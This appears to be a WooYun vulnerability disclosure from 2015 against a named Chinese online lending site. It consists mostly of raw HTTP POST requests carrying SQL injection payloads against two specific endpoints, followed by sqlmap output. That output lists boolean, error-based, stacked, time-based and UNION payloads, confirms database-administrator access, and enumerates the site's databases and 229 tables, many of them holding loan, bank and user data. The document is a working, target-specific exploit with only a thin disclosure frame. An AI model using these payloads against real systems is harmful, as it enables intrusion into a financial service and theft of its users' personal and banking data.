2015-04-28: Vendor is being contacted and the report is waiting for the vendor to claim it; details are not public.
2015-06-12: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
Reference: http://wooyun.org/bugs/wooyun-2015-01105671

~~~
POST /handle/getHelpContent.ashx HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.js808.cn/
Cookie: ASP.NET_SessionId=04bquo552xqo1e55vb1onh45; CheckCode=2822
Host: www.js808.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

id=20%20AND%203*2*1%3d6%20AND%20244%3d244

2
POST /newSite/Other/User_unlock.aspx HTTP/1.1
Content-Length: 1694
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=04bquo552xqo1e55vb1onh45; CheckCode=2822
Host: www.js808.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

btnEmail=%e7%a1%ae%e8%ae%a4%e6%8f%90%e4%ba%a4&ddlTypeOne=email&ddlTypeTwo=email&txtCode=94102&txtLockNickname='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(79)%2bCHAR(117)%2bCHAR(105)%2bCHAR(105)%2bCHAR(105)%2bCHAR(82)%2bCHAR(114)%2bCHAR(110))%20FROM%20syscolumns)%2b'&txtonestr=1&txttwostr=1&__VIEWSTATE=/wEPDwUINDA3OTc4NTYPZBYCAgEPZBYEAgEPZBYCAgEPDxYCHgRUZXh0Bc4BIOasoui/juadpeWIsDgwOOe9kee7nOS/oei0t%2bW5s%2bWPsOOAgiZuYnNwOyZuYnNwO1s8YSBocmVmPSdodHRwOi8vd3d3LmpzODA4LmNuL25ld1NpdGUvT3RoZXIvbG9naW5fbmV3LmFzcHgnPueZu%2bW9lTwvYT5dJm5ic3A7WzxhIGhyZWY9J2h0dHA6Ly93d3cuanM4MDguY24vbmV3U2l0ZS9PdGhlci9yZWdpc3Rlcl9OZXcuYXNweCc%2b5YWN6LS55rOo5YaMPC9hPl1kZAITD2QWAgIBDxYCHglpbm5lcmh0bWwFzAU8bGk%2bPGEgaHJlZj0nIyc%2bPGltZyBib3JkZXI9JzAnIHNyYz0nL2ltYWdlcy9idXR0b25fb2xkXzQwLmdpZicgYWx0PSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nIHRpdGxlPSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nPiZuYnNwOzEzODI3MTgwODwvYT4mbmJzcDsmbmJzcDs4MDjpmL/kuL08L2xpPjxsaT48YSBocmVmPScjJz48aW1nIGJvcmRlcj0nMCcgc3JjPScvaW1hZ2VzL2J1dHRvbl9vbGRfNDAuZ2lmJyBhbHQ9J%2beCueWHu%2bi/memHjOe7meaIkeWPkea2iOaBrycgdGl0bGU9J%2beCueWHu%2bi/memHjOe7meaIkeWPkea2iOaBryc%2bJm5ic3A7MTMzODcxODA4PC9hPiZuYnNwOyZuYnNwOzgwOOmYv%2bmbhTwvbGk%2bPGxpPjxhIGhyZWY9JyMnPjxpbWcgYm9yZGVyPScwJyBzcmM9Jy9pbWFnZXMvYnV0dG9uX29sZF80MC5naWYnIGFsdD0n54K55Ye76L%2bZ6YeM57uZ5oiR5Y%2bR5raI5oGvJyB0aXRsZT0n54K55Ye76L%2bZ6YeM57uZ5oiR5Y%2bR5raI5oGvJz4mbmJzcDsxMzgwNzU4MDg8L2E%2bJm5ic3A7Jm5ic3A7ODA46Zi/6ZyePC9saT48bGk%2bPGEgaHJlZj0nIyc%2bPGltZyBib3JkZXI9JzAnIHNyYz0nL2ltYWdlcy9idXR0b25fb2xkXzQwLmdpZicgYWx0PSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nIHRpdGxlPSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nPiZuYnNwOzEzMDk3MTgwODwvYT4mbmJzcDsmbmJzcDs4MDjpmL/oirM8L2xpPmRk

---
Parameter: id (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (2692=2692) THEN 2692 ELSE 2692*(SELECT 2692 FROM master..sysdatabases) END))

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4707=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4707=4707) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3982=3982) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(78)+CHAR(86)+CHAR(79)+CHAR(102)+CHAR(65)+CHAR(89)+CHAR(115)+CHAR(122)+CHAR(108)+CHAR(97)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113),NULL,NULL--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True
available databases [6]:
[*] 808_mdbs
[*] master
[*] model
[*] msdb
[*] temp808
[*] tempdb

Database: 808_mdbs
[229 tables]
+----------------------+
| Admin_Sign |
| Admin_User_808 |
| Admin_iplists |
| Android_LoginUser |
| Answer_808 |
| BBS_father |
| BBS_repays |
| BBS_son |
| BBS_tie |
| Bank_infor |
| Block_kf |
| CftWith |
| City_8088 |
| City_8088 |
| CreditEdu |
| CreditLevel |
| CreditSorce_808 |
| CustomerAssess |
| CustomerService |
| DataCensus_TzQj |
| EduApplay_808 |
| Edu_Tb_808 |
| EmailValide |
| Freezingzj |
| Friend_hei |
| Friends_808 |
| FundsInfos |
| Funds_balance |
| GiftsDhlist |
| HelpCenterNews |
| HelpClass |
| Invitefriends |
| IpInfors |
| JkEText |
| Jl_tj |
| Job_Tb_808 |
| LimitSendEmail |
| LimitSendEmail |
| Link_Tb_808 |
| LoanInfos_operate |
| LoanInfos_operate |
| LoanQsmd |
| Loan_Review |
| Loaninfos_userinfos |
| LockUsers |
| Lotter_state |
| MailContents |
| Monitor_Tb |
| OthersiteLoan |
| PastApplay |
| PastEdu |
| Pro_dhPack |
| Product_ScoreDh |
| Product_duInfos |
| Qustion_808 |
| ReceiveLoan |
| Reg_Arrt |
| Repaymentloan |
| SendCollection |
| SiteInfor |
| SiteMail |
| SiteUser_dstj |
| SubmitRepayment |
| SystemFather |
| SystemSon |
| TB_Dyzliao |
| TB_Kdbaoedu |
| TB_Txjietu |
| TB_adm_ywlr |
| TB_secpwd |
| Table_kbao |
| Tb_Managelist |
| Tb_Notice |
| Tb_Suggest |
| Tb_dfusers |
| Tb_otherhmd |
| TempSecid |
| TenderInfos |
| Tender_db |
| TestMess1 |
| TestMess1 |
| Tgnc_table |
| TrackKf |
| Upload_System |
| UserEmailActivate |
| UserLogin_error |
| UserRegister_Actions |
| UserSafety |
| UserScoreDetails |
| UserScore_DhTx |
| UserScore_DhTx |
| UserSendMailInfo |
| UserTbMoneyTj |
| User_Lottery |
| User_TruntableReward |
| User_UnLockInfos |
| User_WriteOff |
| User_aqNotice |
| User_loanIntr |
| Users_upload |
| VW_Yqhmd2 |
| VW_Yqhmd2 |
| VW_ZliaoP |
| VW_dbr |
| VW_suggest |
| Vip_Users_808 |
| Vw_Bbsties |
| Vw_Cftwith |
| Vw_Fkrsjsq |
| Vw_Freezes |
| Vw_Friends |
| Vw_Fundsinfors |
| Vw_IpList |
| Vw_L_Review |
| Vw_Lendmx |
| Vw_LoanInfoShenHe |
| Vw_Loaninformations |
| Vw_LotterState |
| Vw_MailContent |
| Vw_ManageUsers |
| Vw_Monitor |
| Vw_PeduApplay |
| Vw_ProPackInfosList |
| Vw_ProPackList |
| Vw_ProductDhInfo |
| Vw_ProductList |
| Vw_Receives |
| Vw_Remind_users |
| Vw_Repayment |
| Vw_SiteEmails |
| Vw_Tgusers |
| Vw_TieComment |
| Vw_Trender |
| Vw_UserLotter |
| Vw_UserWithDrawList |
| Vw_Valide |
| Vw_VipInfos |
| Vw_admiplist |
| Vw_bbsBlock |
| Vw_belowCz |
| Vw_cs_users |
| Vw_dbeduapplay |
| Vw_edhistory |
| Vw_eduapplay |
| Vw_eduapplay |
| Vw_hk2days |
| Vw_hlists |
| Vw_inforsnews |
| Vw_lockuserLists |
| Vw_remindlist |
| Vw_shzt |
| Vw_tgtc |
| Vw_txusers |
| Vw_user_zc |
| Vw_userje |
| Vw_users |
| Vw_webinfor |
| Vw_withdraws |
| Vw_wztjian_Tb |
| Vw_xcyw |
| Vw_yq_users |
| Vw_yqusers |
| WithDraw_list |
| admin_tb_808 |
| applyloan |
| bank_setqx |
| bbstie_comment |
| begsh_tb |
| below_recharge |
| bjin_vip_vw |
| bjin_vip_vw |
| black |
| comd_list |
| cspimg_808 |
| db_ed_808 |
| db_jktb_808 |
| dbeduapplay |
| dbr_tb |
| dya_table |
| ed_history |
| fkrsjrz |
| fksmrz_tb |
| giftslist |
| gzr_list |
| hid_id_tb |
| jkcls_808 |
| kserver_Tb808 |
| onlineorder |
| pinsorce_808 |
| pro_packinfos |
| provinces_808 |
| pshhe_result |
| second_tb |
| self_table |
| spplun_intrs |
| sysdiagrams |
| temp_allscore |
| temp_allscore |
| test_808 |
| tgtc_tb808 |
| userinfos_808 |
| vw_Bbsreplays |
| vw_Tenderdbmx |
| vw_Tenderdbmx |
| vw_answers |
| vw_bankinfo |
| vw_bankqxuser |
| vw_csusers |
| vw_dbjklist |
| vw_diya |
| vw_edus |
| vw_etextlist |
| vw_fksmrz |
| vw_hei_friend |
| vw_jkcns |
| vw_jksmrz |
| vw_jobs |
| vw_onorders |
| vw_question |
| vw_selftb |
| vw_txhk2tian |
| vw_txremind |
| vw_upphotos |
| vw_userwriteoff |
| vw_wbnotices |
| vw_yqlist |
| wztjian_Tb |
| xc_repaymment |
| xc_tjr |
+----------------------+
~~~
The vendor could not be contacted, or the vendor actively declined the report.
Vulnerability Rank: 15 (WooYun rating)